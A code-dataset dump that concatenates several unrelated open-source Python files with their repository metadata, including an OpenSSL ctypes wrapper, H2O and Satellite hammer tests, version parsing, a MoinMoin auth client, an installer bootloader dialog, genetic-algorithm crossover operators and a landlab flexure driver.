ret = libcrypto.EVP_PKEY_CTX_ctrl_str(ctx, op, value)
if ret == -2:
raise PKeyError("Parameter %s is not supported by key" % oper)
if ret < 1:
raise PKeyError("Error setting parameter %s" % oper)
# Declare function prototypes
libcrypto.EVP_PKEY_cmp.argtypes = (c_void_p, c_void_p)
libcrypto.PEM_read_bio_PrivateKey.restype = c_void_p
libcrypto.PEM_read_bio_PrivateKey.argtypes = (c_void_p, POINTER(c_void_p),
PW_CALLBACK_FUNC, c_char_p)
libcrypto.PEM_read_bio_PUBKEY.restype = c_void_p
libcrypto.PEM_read_bio_PUBKEY.argtypes = (c_void_p, POINTER(c_void_p),
PW_CALLBACK_FUNC, c_char_p)
libcrypto.d2i_PUBKEY_bio.restype = c_void_p
libcrypto.d2i_PUBKEY_bio.argtypes = (c_void_p, c_void_p)
libcrypto.d2i_PrivateKey_bio.restype = c_void_p
libcrypto.d2i_PrivateKey_bio.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_print_public.argtypes = (c_void_p, c_void_p, c_int, c_void_p)
libcrypto.EVP_PKEY_asn1_find_str.restype = c_void_p
libcrypto.EVP_PKEY_asn1_find_str.argtypes = (c_void_p, c_char_p, c_int)
libcrypto.EVP_PKEY_asn1_get0_info.restype = c_int
libcrypto.EVP_PKEY_asn1_get0_info.argtypes = (POINTER(c_int), POINTER(c_int),
POINTER(c_int), POINTER(c_char_p),
POINTER(c_char_p), c_void_p)
libcrypto.EVP_PKEY_cmp.restype = c_int
libcrypto.EVP_PKEY_cmp.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_ctrl_str.restype = c_int
libcrypto.EVP_PKEY_CTX_ctrl_str.argtypes = (c_void_p, c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_ctrl.restype = c_int
libcrypto.EVP_PKEY_CTX_ctrl.argtypes = (c_void_p, c_int, c_int, c_int, c_int,
c_void_p)
libcrypto.EVP_PKEY_CTX_free.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_CTX_new.restype = c_void_p
libcrypto.EVP_PKEY_CTX_new.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_CTX_new_id.restype = c_void_p
libcrypto.EVP_PKEY_CTX_new_id.argtypes = (c_int, c_void_p)
libcrypto.EVP_PKEY_derive.restype = c_int
libcrypto.EVP_PKEY_derive.argtypes = (c_void_p, c_char_p, POINTER(c_long))
libcrypto.EVP_PKEY_derive_init.restype = c_int
libcrypto.EVP_PKEY_derive_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_derive_set_peer.restype = c_int
libcrypto.EVP_PKEY_derive_set_peer.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_free.argtypes = (c_void_p,)
libcrypto.EVP_PKEY_keygen.restype = c_int
libcrypto.EVP_PKEY_keygen.argtypes = (c_void_p, c_void_p)
libcrypto.EVP_PKEY_keygen_init.restype = c_int
libcrypto.EVP_PKEY_keygen_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_sign.restype = c_int
libcrypto.EVP_PKEY_sign.argtypes = (c_void_p, c_char_p, POINTER(c_long),
c_char_p, c_long)
libcrypto.EVP_PKEY_sign_init.restype = c_int
libcrypto.EVP_PKEY_sign_init.argtypes = (c_void_p, )
libcrypto.EVP_PKEY_verify.restype = c_int
libcrypto.EVP_PKEY_verify.argtypes = (c_void_p, c_char_p, c_long, c_char_p,
c_long)
libcrypto.EVP_PKEY_verify_init.restype = c_int
libcrypto.EVP_PKEY_verify_init.argtypes = (c_void_p, )
libcrypto.PEM_write_bio_PrivateKey.argtypes = (c_void_p, c_void_p, c_void_p,
c_char_p, c_int,
PW_CALLBACK_FUNC, c_char_p)
libcrypto.PEM_write_bio_PUBKEY.argtypes = (c_void_p, c_void_p)
libcrypto.i2d_PUBKEY_bio.argtypes = (c_void_p, c_void_p)
libcrypto.i2d_PKCS8PrivateKey_bio.argtypes = (c_void_p, c_void_p, c_void_p,
c_char_p, c_int,
PW_CALLBACK_FUNC, c_char_p)
libcrypto.d2i_PKCS8PrivateKey_bio.restype = c_void_p
libcrypto.d2i_PKCS8PrivateKey_bio.argtypes = (c_void_p,c_void_p,
PW_CALLBACK_FUNC,c_void_p)
libcrypto.ENGINE_finish.argtypes = (c_void_p, )
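# Hedged usage sketch (illustrative addition; not part of the original module).
# It walks through the PKey API documented above: generate a keypair, export
# and re-import the public half, then sign and verify. The 32-byte digest is a
# stand-in value, not real hash output, and default RSA padding is assumed.
if __name__ == '__main__':
    keypair = PKey.generate("rsa", rsa_keygen_bits=2048)
    pub_only = PKey(pubkey=keypair.exportpub())
    digest = b"\x01" * 32
    signature = keypair.sign(digest)
    print(pub_only.verify(digest, signature))  # expected: True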
| mit | -4,676,680,321,203,825,000 | 41.33853 | 116 | 0.576907 | false |
bospetersen/h2o-3 | h2o-py/tests/testdir_algos/glm/pyunit_mean_residual_devianceGLM.py | 1 | 1334 | import sys
sys.path.insert(1,"../../../")
import h2o, tests
def glm_mean_residual_deviance(ip,port):
cars = h2o.import_file(path=h2o.locate("smalldata/junit/cars_20mpg.csv"))
s = cars[0].runif()
train = cars[s > 0.2]
valid = cars[s <= 0.2]
predictors = ["displacement","power","weight","acceleration","year"]
response_col = "economy"
glm = h2o.glm(x=train[predictors],
y=train[response_col],
validation_x=valid[predictors],
validation_y=valid[response_col],
nfolds=3)
glm_mrd = glm.mean_residual_deviance(train=True,valid=True,xval=True)
assert isinstance(glm_mrd['train'],float), "Expected training mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['train']))
assert isinstance(glm_mrd['valid'],float), "Expected validation mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['valid']))
assert isinstance(glm_mrd['xval'],float), "Expected cross-validation mean residual deviance to be a float, but got " \
"{0}".format(type(glm_mrd['xval']))
if __name__ == '__main__':
tests.run_test(sys.argv, glm_mean_residual_deviance)
| apache-2.0 | 8,200,899,898,499,487,000 | 48.407407 | 122 | 0.570465 | false |
iksaif/euscan | pym/euscan/version.py | 1 | 3456 | import re
gentoo_unstable = ("alpha", "beta", "pre", "rc")
gentoo_types = ("alpha", "beta", "pre", "rc", "p")
def is_version_type_stable(version_type):
return version_type not in gentoo_unstable
def is_version_stable(version):
return is_version_type_stable(get_version_type(version))
def get_version_type(version):
types = []
if "9999" in version or "99999999" in version:
return "live"
for token in re.findall("[\._-]([a-zA-Z]+)", version):
if token in gentoo_types:
types.append(token)
if types:
return types[0] # TODO: consider returning all types
return "release"
# Stolen from pkg_resources, but importing it is not a good idea
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = \
{'pre': 'c', 'preview': 'c', '-': 'final-', 'rc': 'c', 'dev': '@'}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
yield part.zfill(8) # pad for numeric comparison
else:
yield '*' + part
yield '*final' # ensure that alpha/beta/candidate are before final
def parse_version(s):
"""Convert a version string to a chronologically-sortable key
This is a rough cross between distutils' StrictVersion and LooseVersion;
if you give it versions that would work with StrictVersion, then it behaves
the same; otherwise it acts like a slightly-smarter LooseVersion. It is
*possible* to create pathological version coding schemes that will fool
this parser, but they should be very rare in practice.
The returned value will be a tuple of strings. Numeric portions of the
version are padded to 8 digits so they will compare numerically, but
without relying on how numbers compare relative to strings. Dots are
dropped, but dashes are retained. Trailing zeros between alpha segments
or dashes are suppressed, so that e.g. "2.4.0" is considered the same as
"2.4". Alphanumeric parts are lower-cased.
The algorithm assumes that strings like "-" and any alpha string that
alphabetically follows "final" represents a "patch level". So, "2.4-1"
is assumed to be a branch or patch of "2.4", and therefore "2.4.1" is
considered newer than "2.4-1", which in turn is newer than "2.4".
Strings like "a", "b", "c", "alpha", "beta", "candidate" and so on (that
come before "final" alphabetically) are assumed to be pre-release versions,
so that the version "2.4" is considered newer than "2.4a1".
Finally, to handle miscellaneous cases, the strings "pre", "preview", and
"rc" are treated as if they were "c", i.e. as though they were release
candidates, and therefore are not as new as a version string that does not
contain them, and "dev" is replaced with an '@' so that it sorts lower than
than any other pre-release tag.
"""
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
if part < '*final': # remove '-' before a prerelease tag
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
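# Hedged illustration (added; not part of the original module) of the ordering
# rules described in the parse_version() docstring above:
if __name__ == '__main__':
    assert parse_version('2.4a1') < parse_version('2.4')   # pre-release before final
    assert parse_version('2.4') < parse_version('2.4-1')   # "-1" is a patch level
    assert parse_version('2.4-1') < parse_version('2.4.1')
    assert parse_version('1.9') < parse_version('1.10')    # numeric, not lexical, compare
    assert is_version_stable('1.2.3') and not is_version_stable('1.2.3_rc1')
    print('all ordering examples hold')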
| gpl-2.0 | 5,845,581,522,550,137,000 | 37.831461 | 79 | 0.643229 | false |
ldjebran/robottelo | tests/foreman/cli/test_hammer.py | 2 | 7839 | """Tests related to hammer command and its options and subcommands.
:Requirement: Hammer
:CaseAutomation: Automated
:CaseLevel: Component
:CaseComponent: Hammer
:TestType: Functional
:CaseImportance: High
:Upstream: No
"""
import json
import re
from fauxfactory import gen_string
from robottelo import ssh
from robottelo.cli import hammer
from robottelo.cli.defaults import Defaults
from robottelo.cli.factory import make_org, make_product
from robottelo.decorators import tier1, upgrade
from robottelo.helpers import is_open, read_data_file
from robottelo.test import CLITestCase
from six import StringIO
HAMMER_COMMANDS = json.loads(read_data_file('hammer_commands.json'))
def _fetch_command_info(command):
"""Fetch command info from expected commands info dictionary."""
info = HAMMER_COMMANDS
if command != 'hammer':
found = []
parts = command.split(' ')[1:] # exclude hammer
for part in parts:
for command in info['subcommands']:
if command['name'] == part:
found.append(part)
info = command
break
if found != parts:
return None
return info
def _format_commands_diff(commands_diff):
"""Format the commands differences into a human readable format."""
output = StringIO()
for key, value in sorted(commands_diff.items()):
if key == 'hammer':
continue
output.write('{}{}\n'.format(
key,
' (new command)' if value['added_command'] else ''
))
if value.get('added_subcommands'):
output.write(' Added subcommands:\n')
for subcommand in value.get('added_subcommands'):
output.write(' * {}\n'.format(subcommand))
if value.get('added_options'):
output.write(' Added options:\n')
for option in value.get('added_options'):
output.write(' * {}\n'.format(option))
if value.get('removed_subcommands'):
output.write(' Removed subcommands:')
for subcommand in value.get('removed_subcommands'):
output.write(' * {}'.format(subcommand))
if value.get('removed_options'):
output.write(' Removed options:\n')
for option in value.get('removed_options'):
output.write(' * {}\n'.format(option))
output.write('\n')
output_value = output.getvalue()
output.close()
return output_value
class HammerCommandsTestCase(CLITestCase):
"""Tests for ensuring that all expected hammer subcommands and its options
are present.
"""
def __init__(self, *args, **kwargs):
super(HammerCommandsTestCase, self).__init__(*args, **kwargs)
self.differences = {}
def _traverse_command_tree(self):
"""Walk through the hammer commands tree and assert that the expected
options are present.
"""
raw_output = ssh.command(
'hammer full-help', output_format='plain').stdout
commands = re.split('.*\n(?=hammer.*\n^[-]+)', raw_output, flags=re.M)
commands.pop(0) # remove "Hammer CLI help" line
for raw_command in commands:
raw_command = raw_command.splitlines()
command = raw_command.pop(0).replace(' >', '')
output = hammer.parse_help(raw_command)
command_options = set([
option['name'] for option in output['options']])
command_subcommands = set(
[subcommand['name'] for subcommand in output['subcommands']]
)
expected = _fetch_command_info(command)
expected_options = set()
expected_subcommands = set()
if expected is not None:
expected_options = set(
[option['name'] for option in expected['options']]
)
expected_subcommands = set([
subcommand['name']
for subcommand in expected['subcommands']
])
if is_open('BZ:1666687'):
cmds = ['hammer report-template create', 'hammer report-template update']
if command in cmds:
command_options.add('interactive')
if 'hammer virt-who-config fetch' in command:
command_options.add('output')
added_options = tuple(command_options - expected_options)
removed_options = tuple(expected_options - command_options)
added_subcommands = tuple(
command_subcommands - expected_subcommands)
removed_subcommands = tuple(
expected_subcommands - command_subcommands)
if (added_options or added_subcommands or removed_options or
removed_subcommands):
diff = {
'added_command': expected is None,
}
if added_options:
diff['added_options'] = added_options
if removed_options:
diff['removed_options'] = removed_options
if added_subcommands:
diff['added_subcommands'] = added_subcommands
if removed_subcommands:
diff['removed_subcommands'] = removed_subcommands
self.differences[command] = diff
@tier1
@upgrade
def test_positive_all_options(self):
"""check all provided options for every hammer command
:id: 1203ab9f-896d-4039-a166-9e2d36925b5b
:expectedresults: All expected options are present
:CaseImportance: Critical
"""
self.maxDiff = None
self._traverse_command_tree()
if self.differences:
self.fail(
'\n' + _format_commands_diff(self.differences)
)
class HammerTestCase(CLITestCase):
"""Tests related to hammer sub options. """
@tier1
@upgrade
def test_positive_disable_hammer_defaults(self):
"""Verify hammer disable defaults command.
:id: d0b65f36-b91f-4f2f-aaf8-8afda3e23708
:steps:
1. Add hammer defaults as organization-id.
2. Verify hammer product list successful.
3. Run hammer --no-use-defaults product list.
:expectedresults: Hammer --no-use-defaults product list should fail.
:CaseImportance: Critical
:BZ: 1640644
"""
default_org = make_org()
default_product_name = gen_string('alpha')
make_product({
u'name': default_product_name,
u'organization-id': default_org['id']
})
try:
Defaults.add({
u'param-name': 'organization_id',
u'param-value': default_org['id'],
})
# Verify --organization-id is not required to pass if defaults are set
result = ssh.command('hammer product list')
self.assertEqual(result.return_code, 0)
# Verify product list fail without using defaults
result = ssh.command('hammer --no-use-defaults product list')
self.assertNotEqual(result.return_code, 0)
self.assertFalse(default_product_name in "".join(result.stdout))
# Verify --organization-id is not required to pass if defaults are set
result = ssh.command('hammer --use-defaults product list')
self.assertEqual(result.return_code, 0)
self.assertTrue(default_product_name in "".join(result.stdout))
finally:
Defaults.delete({u'param-name': 'organization_id'})
result = ssh.command('hammer defaults list')
self.assertTrue(default_org['id'] not in "".join(result.stdout))
| gpl-3.0 | 7,244,868,775,362,183,000 | 35.802817 | 89 | 0.580304 | false |
smilix/TracMoinMoinAuth | tracmoinmoinauth/moinmoin_auth_by_provider.py | 1 | 2634 | # -*- coding: utf-8 -*-
#
# Get the user data from the https://github.com/smilix/moinAuthProvider action.
# Author: [email protected]
import requests
from requests.packages.urllib3 import PoolManager
class MoinMoinAuthByProvider():
def __init__(self, logger, provider_url, psk, ssl_fingerprint, ca_certs, disable_cache):
if provider_url is None or provider_url == "":
raise ValueError('No "provider_url" configuration.')
if psk is None or psk == "":
raise ValueError('No "psk" configuration.')
self._provider_url = provider_url
self._psk = psk
self._ssl_fingerprint = ssl_fingerprint
self._ca_certs = ca_certs
# ToDo: implement
self._disable_cache = disable_cache
self._session = requests.Session()
fingerprint_adapter = _FingerprintAdapter(self._ssl_fingerprint)
self._session.mount("https://", fingerprint_adapter)
def get_users(self):
result = self._make_request("list")
user_list = []
for user in result:
user_list.append(user["login"])
return user_list
def check_password(self, user, password):
result = self._make_request("loginCheck", {
"login": user,
"password": password
})
if result["result"] == "ok":
return True
elif result["result"] == "wrong_password":
return False
else:
return None
def _make_request(self, do_type, json=None):
if not json:
json = {}
url = self._provider_url + "?action=authService&do=" + do_type
resp = self._session.post(url, headers={
"Auth-Token": self._psk
}, json=json, verify=self._ca_certs)
if resp.status_code != 200:
raise StandardError("Unexpected response code %d for '%s'. \nServer response was: %s" % (resp.status_code, url, resp.text))
return resp.json()
# from https://github.com/untitaker/vdirsyncer/blob/9d3a9611b2db2e92f933df30dd98c341a50c6211/vdirsyncer/utils/__init__.py#L198
class _FingerprintAdapter(requests.adapters.HTTPAdapter):
def __init__(self, fingerprint=None, **kwargs):
self.fingerprint = str(fingerprint)
super(_FingerprintAdapter, self).__init__(**kwargs)
def init_poolmanager(self, connections, maxsize, block=False):
self.poolmanager = PoolManager(num_pools=connections,
maxsize=maxsize,
block=block,
assert_fingerprint=self.fingerprint)
| mit | 8,862,389,650,365,923,000 | 34.12 | 135 | 0.595672 | false |
icomfort/anaconda | iw/upgrade_bootloader_gui.py | 1 | 7815 | #
# upgrade_bootloader_gui.py: gui bootloader dialog for upgrades
#
# Copyright (C) 2002, 2007 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Author(s): Jeremy Katz <[email protected]>
#
# must replace with explicit form so update disks will work
from iw_gui import *
import gtk
from booty import checkbootloader
from storage.devices import devicePathToName
from constants import *
import gettext
_ = lambda x: gettext.ldgettext("anaconda", x)
import logging
log = logging.getLogger("anaconda")
class UpgradeBootloaderWindow (InstallWindow):
windowTitle = N_("Upgrade Boot Loader Configuration")
def getPrev(self):
pass
def getNext(self):
if self.nobl_radio.get_active():
self.dispatch.skipStep("bootloadersetup", skip = 1)
self.dispatch.skipStep("bootloader", skip = 1)
self.dispatch.skipStep("bootloaderadvanced", skip = 1)
self.dispatch.skipStep("instbootloader", skip = 1)
elif self.newbl_radio.get_active():
self.dispatch.skipStep("bootloadersetup", skip = 0)
self.dispatch.skipStep("bootloader", skip = 0)
self.dispatch.skipStep("bootloaderadvanced", skip = 0)
self.dispatch.skipStep("instbootloader", skip = 0)
self.bl.doUpgradeOnly = 0
else:
self.dispatch.skipStep("bootloadersetup", skip = 0)
self.dispatch.skipStep("bootloader", skip = 1)
self.dispatch.skipStep("bootloaderadvanced", skip = 1)
self.dispatch.skipStep("instbootloader", skip = 0)
self.bl.doUpgradeOnly = 1
if self.type == "GRUB":
self.bl.useGrubVal = 1
else:
self.bl.useGrubVal = 0
self.bl.setDevice(devicePathToName(self.bootDev))
def _newToLibata(self, rootPath):
# NOTE: any changes here need to be done in upgrade_bootloader_text too
try:
f = open("/proc/modules", "r")
buf = f.read()
if buf.find("libata") == -1:
return False
except:
log.debug("error reading /proc/modules")
pass
try:
f = open(rootPath + "/etc/modprobe.conf")
except:
log.debug("error reading /etc/modprobe.conf")
return False
modlines = f.readlines()
f.close()
try:
f = open("/tmp/scsidisks")
except:
log.debug("error reading /tmp/scsidisks")
return False
mods = []
for l in f.readlines():
(disk, mod) = l.split()
if mod.strip() not in mods:
mods.append(mod.strip())
f.close()
for l in modlines:
stripped = l.strip()
if stripped == "" or stripped[0] == "#":
continue
if stripped.find("scsi_hostadapter") != -1:
mod = stripped.split()[-1]
if mod in mods:
mods.remove(mod)
if len(mods) > 0:
return True
return False
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
newToLibata = self._newToLibata(anaconda.rootPath)
(self.type, self.bootDev) = \
checkbootloader.getBootloaderTypeAndBoot(anaconda.rootPath, storage=anaconda.id.storage)
self.update_radio = gtk.RadioButton(None, _("_Update boot loader configuration"))
updatestr = _("This will update your current boot loader.")
if newToLibata or (self.type is None or self.bootDev is None):
if newToLibata:
current = _("Due to system changes, your boot loader "
"configuration can not be automatically updated.")
else:
current = _("The installer is unable to detect the boot loader "
"currently in use on your system.")
self.update_label = gtk.Label("%s" % (updatestr,))
self.update_radio.set_sensitive(False)
self.update_label.set_sensitive(False)
update = 0
else:
current = _("The installer has detected the %(type)s boot loader "
"currently installed on %(bootDev)s.") \
% {'type': self.type, 'bootDev': self.bootDev}
self.update_label = gtk.Label("%s %s" % (updatestr,
_("This is the recommended option.")))
self.update_radio.set_active(False)
update = 1
self.newbl_radio = gtk.RadioButton(self.update_radio,
_("_Create new boot loader "
"configuration"))
self.newbl_label = gtk.Label(_("This option creates a "
"new boot loader configuration. If "
"you wish to switch boot loaders, you "
"should choose this."))
self.newbl_radio.set_active(False)
self.nobl_radio = gtk.RadioButton(self.update_radio,
_("_Skip boot loader updating"))
self.nobl_label = gtk.Label(_("This option makes no changes to boot "
"loader configuration. If you are "
"using a third party boot loader, you "
"should choose this."))
self.nobl_radio.set_active(False)
for label in [self.update_label, self.nobl_label, self.newbl_label]:
label.set_alignment(0.8, 0)
label.set_size_request(275, -1)
label.set_line_wrap(True)
str = _("What would you like to do?")
# if they have one, the default is to update, otherwise the
# default is to not touch anything
if update == 1:
default = self.update_radio
elif newToLibata:
default = self.newbl_radio
else:
default = self.nobl_radio
if not self.dispatch.stepInSkipList("bootloader"):
self.newbl_radio.set_active(True)
elif self.dispatch.stepInSkipList("instbootloader"):
self.nobl_radio.set_active(True)
else:
default.set_active(True)
box = gtk.VBox(False, 5)
label = gtk.Label(current)
label.set_line_wrap(True)
label.set_alignment(0.5, 0.0)
label.set_size_request(300, -1)
label2 = gtk.Label(str)
label2.set_line_wrap(True)
label2.set_alignment(0.5, 0.0)
label2.set_size_request(300, -1)
box.pack_start(label, False)
box.pack_start(label2, False, padding = 10)
box.pack_start(self.update_radio, False)
box.pack_start(self.update_label, False)
box.pack_start(self.nobl_radio, False)
box.pack_start(self.nobl_label, False)
box.pack_start(self.newbl_radio, False)
box.pack_start(self.newbl_label, False)
a = gtk.Alignment(0.2, 0.1)
a.add(box)
return a
| gpl-2.0 | -1,104,869,317,210,438,500 | 36.392344 | 108 | 0.565963 | false |
longyangking/Husky | Husky/GA/MultiUtils/Crossover.py | 1 | 8881 | # Author: Yang Long <[email protected]>
#
# License: LGPL-2.1
import numpy as np
def Laplacian(parents,rank,distance,LB,UB,IntCon,args):
'''
Laplacian Crossover Operator (Two parents, Two childs: Son & Girl)
'''
a = 0
breal = 0.5
bint = 0.75
if args.has_key('a'):
a = args['a']
if args.has_key('breal'):
breal = args['breal']
if args.has_key('bint'):
bint = args['bint']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
r = np.random.random(N)
u = np.random.random(N)
beta = a + breal*np.log(u)*(r>0.5) - breal*np.log(u)*(r<=0.5)
if IntCon is not None:
beta[IntCon] = a + bint*np.log(u[IntCon])*(r[IntCon]>0.5) - bint*np.log(u[IntCon])*(r[IntCon]<=0.5)
father = parents[fatherindex]
mother = parents[motherindex]
son = father + beta*np.abs(father - mother)
girl = mother + beta*np.abs(father - mother)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
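# Hypothetical usage sketch (not part of the original module); the population
# values, bounds, and parameter choices below are illustrative only:
#
#   import numpy as np
#   parents = np.array([[0.5, 2.0], [1.5, 4.0], [0.2, 3.0], [0.9, 1.0]])
#   LB, UB = np.array([0.0, 0.0]), np.array([2.0, 5.0])
#   childs = Laplacian(parents, None, None, LB, UB, IntCon=[1],
#                      args={'a': 0, 'breal': 0.5, 'bint': 0.75})
#
# `rank` and `distance` are accepted but unused by this operator; column 1 of
# the offspring is snapped to integer values (IntCon) and all values are
# clipped into [LB, UB].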
def Scattered(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on the random binary control vector
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
p = np.random.randint(2,size=N)
father = parents[fatherindex]
mother = parents[motherindex]
son = father*(p==1) + mother*(p==0)
girl = father*(p==0) + mother*(p==1)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def SinglePoint(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on a random point
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
pos = np.random.randint(1,N)
father = parents[fatherindex]
mother = parents[motherindex]
son = np.concatenate((father[:pos], mother[pos:]))
girl = np.concatenate((mother[:pos], father[pos:]))
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def TwoPoint(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on two random points (Default)
'''
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
if N > 1:
start = np.random.randint(N-1)
end = np.random.randint(start,N)
else:
start = N
end = N
father = parents[fatherindex]
mother = parents[motherindex]
son = np.concatenate((mother[:start], father[start:end], mother[end:]))
girl = np.concatenate((father[:start], mother[start:end], father[end:]))
childs[index] = son
if index+1 < M: # Odd number of parents
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def Intermediate(parents,rank,distance,LB,UB,IntCon,args):
'''
Crossover based on the intermediate evolution
'''
ratio = 1.0
if args.has_key('ratio'):
ratio = args['ratio']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
father = parents[fatherindex]
mother = parents[motherindex]
son = father + ratio*np.random.random(size=N)*(mother - father)
girl = mother + ratio*np.random.random(size=N)*(father - mother)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def Heuristic(parents,rank,distance,LB,UB,IntCon,args):
'''
Evolve with the direction to better parent
'''
R = 1.2
if args.has_key('R'):
R = args['R']
(M,N) = np.shape(parents)
childs = np.zeros([M,N])
index = 0
while index < M:
fatherindex = np.random.randint(M)
motherindex = np.random.randint(M)
while fatherindex == motherindex:
motherindex = np.random.randint(M)
        father = parents[fatherindex]
        mother = parents[motherindex]
        # NOTE: the original code indexed `fitness` with the variables being
        # assigned; the intent is clearly a per-parent fitness lookup. `fitness`
        # itself is not a parameter of this function, so callers must make it
        # available (e.g. via `args`) for Heuristic crossover to run.
        fatherfitness = fitness[fatherindex]
        motherfitness = fitness[motherindex]
son = father + (fatherfitness>motherfitness)*R*(father - mother) + (fatherfitness<=motherfitness)*R*(mother - father)
girl = mother + (fatherfitness>motherfitness)*R*(father - mother) + (fatherfitness<=motherfitness)*R*(mother - father)
childs[index] = son
childs[index+1] = girl
index = index + 2
# Constraint childs with LB, UB and IntCon
for i in range(M):
child = childs[i]
if IntCon is not None:
intchild = np.floor(child[IntCon])
intchild = intchild + 1*(np.random.random(size=np.size(intchild))>0.5)
child[IntCon] = intchild
posLB = np.where(child<LB)
child[posLB] = LB[posLB]
posUB = np.where(child>UB)
child[posUB] = UB[posUB]
childs[i] = child
return childs
def LogisticChaoticSequence(parents,rank,distance,LB,UB,IntCon,args):
# TODO This part will be done after the completement of module Optimize
    return TwoPoint(parents,rank,distance,LB,UB,IntCon,args)
def Arithmetic(parents,rank,distance,LB,UB,IntCon,args):
# TODO This part will be done after the completement of module Optimize
    return TwoPoint(parents,rank,distance,LB,UB,IntCon,args)
| lgpl-2.1 | 6,432,612,505,830,202,000 | 28.118033 | 126 | 0.56041 | false |
decvalts/landlab | landlab/components/gflex/examples/gflex_coupled_driver.py | 1 | 2398 | # -*- coding: utf-8 -*-
"""
A driver for our version of AW's gFlex component.
Created on Fri Feb 20 11:17:52 2015
@author: danhobley
"""
from __future__ import print_function
from landlab.components.gFlex.flexure import gFlex
from landlab.components.flow_routing.route_flow_dn import FlowRouter
from landlab.components.stream_power.fastscape_stream_power import SPEroder as Fsc
from landlab.components.stream_power.stream_power import StreamPowerEroder
import numpy as np
import pylab
from landlab import RasterModelGrid
from landlab import ModelParameterDictionary
from landlab.plot.imshow import imshow_node_grid
inputs = ModelParameterDictionary('./coupled_SP_gflex_params.txt')
nrows = inputs.read_int('nrows')
ncols = inputs.read_int('ncols')
dx = inputs.read_float('dx')
dt = inputs.read_float('dt')
time_to_run = inputs.read_float('run_time')
init_elev = inputs.read_float('init_elev')
uplift_perstep = inputs.read_float('uplift_rate')*dt
rock_stress_param = inputs.read_float('rock_density')*9.81
mg = RasterModelGrid(nrows, ncols, dx)
#create the fields in the grid
mg.create_node_array_zeros('topographic__elevation')
z = mg.create_node_array_zeros() + init_elev
mg['node'][ 'topographic__elevation'] = z + np.random.rand(len(z))/1000.
